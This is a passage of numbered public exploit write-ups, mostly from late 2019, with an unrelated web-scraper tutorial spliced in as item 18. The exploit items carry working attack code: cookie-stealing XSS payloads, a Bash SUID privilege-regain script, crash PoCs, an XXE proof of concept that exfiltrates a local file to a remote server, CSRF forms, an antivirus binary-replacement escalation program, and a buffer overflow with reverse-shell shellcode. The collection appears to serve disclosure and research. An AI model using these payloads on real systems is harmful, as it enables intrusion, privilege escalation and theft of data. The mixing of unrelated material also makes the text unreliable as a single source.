              NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\TenaxSoft\CyberPlanet\SrvProxy.exe
              GRUPO_ORDEN_CARGA  :
              ETIQUETA           : 0
              NOMBRE_MOSTRAR     : CCSrvProxy
              DEPENDENCIAS       : Spooler
              NOMBRE_INICIO_SERVICIO: LocalSystem
      ##########################################################################
  15. # Exploit Title: Online Inventory Manager 3.2 - Persistent Cross-Site Scripting
      # Date: 2019-11-29
      # Exploit Author: Cemal Cihad ÇİFTÇİ
      # Vendor Homepage: https://bigprof.com
      # Software Link : https://bigprof.com/appgini/applications/online-inventory-manager
      # Software : Online Inventory Manager
      # Version : 3.2
      # Vulnerability Type : Cross-site Scripting
      # Vulnerability : Stored XSS
      # Tested on: Windows 10 Pro

      # Stored XSS has been discovered in the Online Inventory Manager created by bigprof/AppGini,
      # in the editgroups section (http://localhost/inventory/admin/pageEditGroup.php?groupID=1).

      # Payload I used: "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>"

      # POC: at http://localhost/inventory/admin/pageViewGroups.php you can edit the group
      # information by pressing the group name. After the edit page opens, you can enter your
      # payload into the description field. After going back to the groups page you will see
      # your JavaScript code run.
      # This vulnerability also exists while you are creating a new group.
  16. # Exploit Title : Bash 5.0 Patch 11 - SUID Priv Drop Exploit
      # Date : 2019-11-29
      # Original Author: Ian Pudney , Chet Ramey
      # Exploit Author : Mohin Paramasivam (Shad0wQu35t)
      # Version : < Bash 5.0 Patch 11
      # Tested on Linux
      # Credit : Ian Pudney from Google Security and Privacy Team based on Google CTF suidbash
      # CVE : 2019-18276
      # CVE Link : https://nvd.nist.gov/vuln/detail/CVE-2019-18276 , https://www.youtube.com/watch?v=-wGtxJ8opa8
      # Exploit Demo POC : https://youtu.be/Dbwvzbb38W0

      Description :
      An issue was discovered in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. By default, if Bash is run with its effective UID not equal to its real UID, it will drop privileges by setting its effective UID to its real UID. However, it does so incorrectly. On Linux and other systems that support "saved UID" functionality, the saved UID is not dropped. An attacker with command execution in the shell can use "enable -f" for runtime loading of a new builtin, which can be a shared object that calls setuid() and therefore regains privileges. However, binaries running with an effective UID of 0 are unaffected.

      ```bash
      #!/bin/bash

      # Terminal Color Codes
      RED='\033[0;31m'
      GREEN='\033[0;32m'
      NC='\033[0m'

      # Get the Effective User ID (owner of the SUID /bin/bash binary)
      read -p "Please enter effective user id (euid) : " euid

      # Create a C file and output the exploit code
      # (unquoted heredoc so that $euid is expanded into the C source)
      touch pwn.c
      echo "" > pwn.c

      cat <<EOT >> pwn.c
      #include <sys/types.h>
      #include <unistd.h>
      #include <stdio.h>

      void __attribute((constructor)) initLibrary(void) {
          printf("Escape lib is initialized\n");
          printf("[LO] uid:%d | euid:%d\n", getuid(), geteuid());
          setuid($euid);
          printf("[LO] uid:%d | euid:%d\n", getuid(), geteuid());
      }
      EOT

      echo -e "${RED}"
      echo -e "Exploit Code copied to pwn.c !\n"
      sleep 5
      echo -e "Compiling Exploit Object ! \n"
      $(which gcc) -c -fPIC pwn.c -o pwn.o
      sleep 5
      echo -e "Compiling Exploit Shared Object ! \n"
      $(which gcc) -shared -fPIC pwn.o -o libpwn.so
      sleep 5
      echo -e "Exploit Compiled ! \n"
      sleep 5
      echo -e "Executing Exploit :) \n"
      sleep 5

      # Execute the Shared Library
      echo -e "${RED}Run : ${NC} enable -f ./libpwn.so asd \n"
      ```
  17. # Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
      # Discovery by: SajjadBnd
      # Date: 2019-11-30
      # Vendor Homepage: http://www.nsauditor.com
      # Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
      # Tested Version: 3.1.8.0
      # Vulnerability Type: Denial of Service (DoS) Local
      # Tested on OS: Windows 10 - Pro

      # About App
      # Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
      # and to provide security alerts. Nsauditor network auditor checks the enterprise network for all potential methods that
      # a hacker might use to attack it and creates a report of potential problems that were found. Nsauditor network auditing
      # software significantly reduces the total cost of network management in enterprise environments by enabling
      # IT personnel and systems administrators to gather a wide range of information from all the computers in the network without
      # installing server-side applications on these computers, and creates a report of potential problems that were found.

      # PoC
      # 1. Run the python script, it will create a new file "dos.txt"
      # 2. Run Nsauditor and click on "Register -> Enter Registration Code"
      # 3. Paste the content of dos.txt into the field 'Name'
      # 4. Click 'ok'
      # 5. Crashed ;)

      ```python
      #!/usr/bin/env python
      # writes 1000 'A' characters to dos.txt
      buffer = "\x41" * 1000
      try:
          f = open("dos.txt", "w")
          print("[+] Creating %s bytes DOS payload.." % len(buffer))
          f.write(buffer)
          f.close()
          print("[+] File created!")
      except IOError:
          print("File cannot be created")
      ```
  18. In the previous article, we talked about using the Web Scraper browser plug-in to implement a crawler. But my friend didn't understand, so this article explains it in depth. I hope it will be helpful for your study and work.

      Single page information crawl

      This is the most basic and simplest crawler: all the desired information is on the same page and is not paginated. We just need to use Web Scraper to crawl it directly.

      Example: crawl the data in the Bilibili (B station) rankings, including video title, author, play count and number of bullet comments (barrages).

      Click Create new sitemap to create a crawler. Next, click Add new selector to create the crawled content. Here I created four of them, corresponding to video title, author, play count and number of bullet comments. After the configuration is complete, click Scrape to start crawling. After the crawler has finished, export the results.

      After exporting, the data was found to be quite messy. This is because the four fields have the same priority. How to solve this problem?

      Know the container

      Web Scraper has the concept of a container, which is like a div in HTML. Put the same divs on the page into the same container, then read the data of each div from the container. The specific steps are as follows: click Create new sitemap to create the container, with Type set to Element. Next, double-click the container to enter it, and create the fields you want to crawl again inside the container. The overall structure is as follows. The final crawler effect.

      Crawl level 2 pages

      For example, in the case above we only obtained the number of views and the number of bullet comments. The number of likes and favourites on Bilibili is not shown there; instead it is on the secondary page. In this case we need to jump to the second page after crawling the first page. The specific steps are as follows: enter the container and select the title field type as Link (clicking on the title enters the secondary page). Double-click the title field and create the like and coin/collection fields inside it. The final effect is as follows.

      Crawl paginated information

      In practice, a lot of information is paginated, for example when we crawl all the video information of an author on Bilibili.

      Regular next button: in many cases, by clicking the button and looking at the response request, we can observe the direct change pattern of the URL, like

      Page 1: https://space.bilibili.com/430579369/video?tid=0&pn=1&keyword=&order=pubdate
      Page 2: https://space.bilibili.com/430579369/video?tid=0&pn=2&keyword=&order=pubdate

      Through observation, it is not difficult to find that pn= controls the page, so we just need to substitute the corresponding variable for it. If there are ten pages of data in total, we can set it to pn=[1-10]. Example: crawl all videos of Xiaoyaozi Big Cousin.

      No rules: for non-standard pagination, we can use a container to simulate clicks to crawl. First we create the crawler and the container. Next create the container. The structure is as follows. Crawling effect.

      Summary

      It is entirely possible to use Web Scraper to complete some simple crawler tasks. It is relatively simple to get started, but it may not work for some sites with anti-crawler mechanisms.
  19. #Exploit Title: SpotAuditor 5.3.2 - 'Name' Denial Of Service
#Exploit Author : ZwX
#Exploit Date: 2019-11-28
#Vendor Homepage : http://www.nsauditor.com/
#Link Software : http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
#Tested on OS: Windows 7
#Social: twitter.com/ZwX2a
#contact: msk4@live.fr

'''
Proof of Concept (PoC):
=======================
1. Download and install SpotAuditor
2. Run the python operating script that will create a file (poc.txt)
3. Run the software "Register -> Enter Registration Code"
4. Copy and paste the characters in the file (poc.txt)
5. Paste the characters in the field 'Name' and click on 'Ok'
6. SpotAuditor Crashed
'''

#!/usr/bin/python
http = "http//"
buffer = "\x41" * 2000
poc = http + buffer
file = open("poc.txt", "w")
file.write(poc)
file.close()
print("POC Created by ZwX")
  20. # Exploit Title: Visual Studio 2008 - XML External Entity Injection
# Discovery by: hyp3rlinx
# Date: 2019-12-02
# Vendor Homepage: www.microsoft.com
# Software Link: Visual Studio 2008 Express IDE
# Tested Version: 2008
# CVE: N/A

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Visual Studio 2008 Express IDE
vcsetup.exe
File hash: 62f764849e8fcdf8bfbc342685641304
Download: http://go.microsoft.com/?linkid=7729279

[Vulnerability Type]
XML External Entity Injection 0Day

[CVE Reference]
N/A

[Security Issue]
Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst. By opening any one of the file types listed below, it can allow remote attackers to steal files from the victim's computer, sending them to the remote attacker's server. Double click any of the following extensions and it will trigger the XXE vulnerability.

Note, upon installation of the IDE the following file types get associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.

[Vuln XXE file types]
.snippet
.i
.s
.asm
.disco
.lst
.inc
.srf
.wsdl
.rgs
.xml

This IDE is pretty old, I know, but it's still available for download as of this writing, therefore I release the advisory.

[References]
https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/

[Exploit/POC]
"Evil.snippet" or any of the extensions mentioned above.
<?xml version="1.0"?>
<!DOCTYPE knobgobslob [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

"payload.dtd"

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

python -m SimpleHTTPServer
python -m http.server (Python3)

[POC Video URL]
https://www.youtube.com/watch?v=QOZlwzsbPrk

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: 3/24/2017
MSRC sent me link to "Definition of a Security Vulnerability"
Also, the product is not supported anymore.
December 1, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  21. # Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
# Discovery by: LiquidWorm
# Date: 2019-12-02
# Vendor Homepage:
# Tested Version: 6.5.33.17072501
# CVE: N/A
# Advisory ID: ZSL-2019-5543
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php

Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities

Vendor: Carlo Gavazzi Automation S.p.A
Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu
Affected version: Web-app: 6.5.33.17072501
                  Web-app: 6.5.32.17062101
                  Web-app: 6.2.3.16102701
                  Web-app: 5.5.3.160421101
                  Web-app: 5.3.3.15120101
                  Release: 1.0.5.1
                  Release: 1.0.5.0
                  Release: 1.0.3.5
                  Release: 1.0.3.2

Summary: Carlo Gavazzi is an international company that develops, manufactures and sells electrical automation components. Our products are used in industrial automation and real estate automation. Smart-house is based on a system that we have developed and produced since 1986, mainly for industrial-related installations. Our system is present in more than 150,000 installations. For a few years now, we have focused our development on smart electrical installations for home and property automation. Smart-house is currently installed in both villas and commercial properties.

Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Input passed to several GET/POST parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
Tested on: Apache
           PHP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2019-5543
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php

01.11.2019

--

Reflected XSS (GET):
--------------------

1. http://192.168.0.24/app/index.php?error=Waddup"><script>confirm(document.cookie)</script> (pre-auth)
2. http://192.168.0.24/app/messagepage.php?msg=<script>confirm(document.cookie)</script> (pre-auth)
3. http://192.168.0.24/app/detaf.php?p=0&l=50"><script>confirm(document.cookie)</script>&f=5658 (post-auth)
4. http://192.168.0.24/app/detaf.php?p=0"><script>confirm(document.cookie)</script>&l=50&f=5658 (post-auth)
5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction"><script>confirm(document.cookie)</script>&grpl=1 (post-auth)

CSRF set temperature:
---------------------

<html>
  <body>
    <form action="http://192.168.0.24/app/datasend.php" method="POST">
      <input type="hidden" name="IDFunction" value="3875" />
      <input type="hidden" name="favorite" value="0" />
      <input type="hidden" name="rooms" value="-1" />
      <input type="hidden" name="userId" value="-300" />
      <input type="hidden" name="heat_ensave_set" value="24" />
      <input type="hidden" name="heat_set" value="25.5" />
      <input type="submit" value="Set" />
    </form>
  </body>
</html>

Stored XSS (POST):
------------------

<html>
  <body>
    <form action="http://192.168.0.24/app/command.php" method="POST">
      <input type="hidden" name="op" value="11" />
      <input type="hidden" name="name" value='Graph name"><script>confirm(document.cookie)</script>' />
      <input type="hidden" name="period" value="2" />
      <input type="hidden" name="gg" value="6" />
      <input type="hidden" name="ggf" value="6" />
      <input type="hidden" name="mm" value="11" />
      <input type="hidden" name="mmf" value="11" />
      <input type="hidden" name="aa" value="2019" />
      <input type="hidden" name="aaf" value="2019" />
      <input type="hidden" name="param" value="[1]" />
      <input type="submit" value="Send" />
    </form>
  </body>
</html>

Reflected XSS (POST):
---------------------

<html>
  <body>
    <form action="http://192.168.0.24/refresh.php">
      <input type="hidden" name="param[0][]" value="switch0251<script>confirm(document.cookie)</script>" />
      <input type="hidden" name="param[0][]" value="0251" />
      <input type="hidden" name="param[0][]" value="switch" />
      <input type="hidden" name="param[1][]" value="switch1250" />
      <input type="hidden" name="param[1][]" value="1250" />
      <input type="hidden" name="param[1][]" value="switch" />
      <input type="submit" value="Send" />
    </form>
  </body>
</html>
  22. # Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
# Discovery by: SajjadBnd
# Date: 2019-11-30
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.1.8.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro
# Email : blackwolf@post.com

# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks
# and hosts for vulnerabilities, and to provide security alerts. Nsauditor network auditor checks enterprise
# network for all potential methods that a hacker might use to attack it and create a report of potential
# problems that were found. Nsauditor network auditing software significantly reduces the total cost of
# network management in enterprise environments by enabling IT personnel and systems administrators to gather
# a wide range of information from all the computers in the network without installing server-side applications
# on these computers and create a report of potential problems that were found.

# POC
# 1. Run the python script, it will create a new file "dos.txt"
# 2. Run Nsauditor and click on "Register -> Enter Registration Code"
# 3. Paste the content of dos.txt into the Field: 'Key'
# 4. Click 'ok'
# 5. Crashed ;)

#!/usr/bin/env python
buffer = "\x41" * 1000
try:
    f = open("dos.txt", "w")
    print("[+] Creating %s bytes DOS payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created")
  23. # Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
# Discovery by: hyp3rlinx
# Date: 2019-12-02
# Vendor Homepage: www.maxpcsecure.com
# Tested Version: 19.0.4.020
# CVE: N/A

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec

[Vendor]
www.maxpcsecure.com

[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020
File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe

[Vulnerability Type]
Insecure Permissions

[CVE Reference]
N/A

[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory. Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation.

C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
                                                   BUILTIN\Users:(ID)F
                                                   NT AUTHORITY\SYSTEM:(ID)F
                                                   BUILTIN\Administrators:(ID)F

[Affected Component]
Permissions on installation directory

[Exploit/POC]

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"

/* Max Secure Anti Virus Plus PoC By hyp3rlinx */

BOOL PWNED = FALSE;

/* TRUE when szPath exists and is a file rather than a directory */
BOOL FileExists(LPCTSTR szPath){
    DWORD dwAttrib = GetFileAttributes(szPath);
    return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

int main(void){
    if(!FileExists(DISABLED_TARGET)){
        /* first run: keep a copy of the original EXE under another name */
        CopyFile(TARGET, TMP, FALSE);
        Sleep(1000);
        CopyFile(TMP, DISABLED_TARGET, FALSE);
        printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
        Sleep(1000);
        printf("[+] Disabled MaxSDUI.exe ...\n");
        Sleep(300);
    }else{
        /* second run: this binary is now executing in place of MaxSDUI.exe */
        PWNED = TRUE;
    }

    if(!PWNED){
        char fname[MAX_PATH];
        char newLoc[] = TARGET;
        DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
        if(size){
            printf("[+] Copying exploit to vuln dir...\n");
            Sleep(1000);
            CopyFile(fname, TARGET, FALSE);
            printf("[+] Replaced legit Max Secure EXE...\n");
            Sleep(2000);
            printf("[+] Done!\n");
            MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
            Sleep(1000);
            exit(0);
        }
    }else{
        if(FileExists(TMP)){
            remove(TMP);
        }
        printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
        printf("[+] hyp3rlinx\n");
        system("pause");
    }
    return 0;
}

[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  24. # Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
# Date: 2019-12-01
# Exploit Author: Talha ŞEN
# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
# Software Link: https://download.dokuwiki.org/
# Version: 2018-04-22b "Greebo"
# Tested on:
# Alpine Linux 3.5 (docker image)
# PHP 5.6.30
# Apache/2.4.25 (Unix)
# CVE :

# At the login page there is a "set new password" page as below:
# Forgotten your password? Get a new one: Set new password
# At this page there is a username enumeration vulnerability.

# Testing for non-valid user:
POST /doku.php?id=start&do=resendpwd HTTP/1.1

sectok=&do=resendpwd&save=1&login=sss

# Response for non-valid user (sss):
<div class="error">Sorry, we can't find this user in our database.</div>

========================================================================

# Testing for valid user:
POST /doku.php?id=start&do=resendpwd HTTP/1.1

sectok=&do=resendpwd&save=1&login=admin

# Response for valid user (admin):
<div class="error">There was an unexpected problem communicating with SMTP: Could not open SMTP Port.</div>
<div class="error">Looks like there was an error on sending the password mail. Please contact the admin!</div>
  25. # Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow
# Date: 2019-11-30
# Exploit Author: Luis Catarino & Pedro Rodrigues
# Vendor Homepage: https://www.anviz.com/
# Software Link: https://www.anviz.com/download.html
# Version: Crosschex Standard x86 <= V4.3.12
# Tested on: 4.3.8.0, 4.3.12
# CVE : N/A
# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html

import socket
import time
import sys
import binascii
# Scapy for the broadcast packet with custom sport
from scapy.all import Raw, IP, Dot1Q, UDP, Ether
import scapy.all

# shellcode working calc.exe
calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

# shellcode windows x86 reverse_shell
shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68"

# shellcode windows x86 reverse_shell (part_2)
shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec"
shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89"
shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66"
shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44"
shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68"
shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30"
shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68"
shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0"
shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"

def ipToShellcode(ip):
    a = ip.split('.')
    b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))
    b = b.replace("0x", "")
    return binascii.unhexlify(b)

# sport has to be 5060
def sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060):
    request = b"A"*77  # Original payload substitute
    request += b"B"*184
    request += b"\x07\x18\x42\x00"  # EIP - 00421807 crosscheck_standard.exe
    request += b"A"*4
    # 269 bytes
    if len(sys.argv) > 2:
        request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2
    else:
        request = request + calculator_payload
    scapy.all.sendp(
        Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")/IP(src=ip, dst='255.255.255.255')/UDP(sport=sport, dport=dport)/Raw(load=request),
        iface=sys.argv[1]
    )

def setFuzzUDPServer(ip='', port=5050, timeout=150):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    except:
        print('[!] Failed to create server socket')
    try:
        s.bind(('', port))
    except:
        print('[*] Server socket bind failed')
        sys.exit()
    print('[*] Waiting for crosschex')
    s.settimeout(timeout)
    timeout = time.time() + timeout
    responses = []
    while True:
        if time.time() > timeout:
            break
        try:
            response = s.recvfrom(1024)
            print(response)
            responses.append(response)
            sendFuzzingUDPBroadcast(ip=ip)
            response = s.recvfrom(1024)
        except socket.timeout:
            print("[!] Error with UDP server")
    s.close()
    return responses

nargs = len(sys.argv)
if nargs < 2:
    # the script name was never substituted into the %s placeholder; pass sys.argv[0]
    print("[*] Usage: python3 %s <network_interface> [<ip>]\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445" % sys.argv[0])
    sys.exit(0)

setFuzzUDPServer()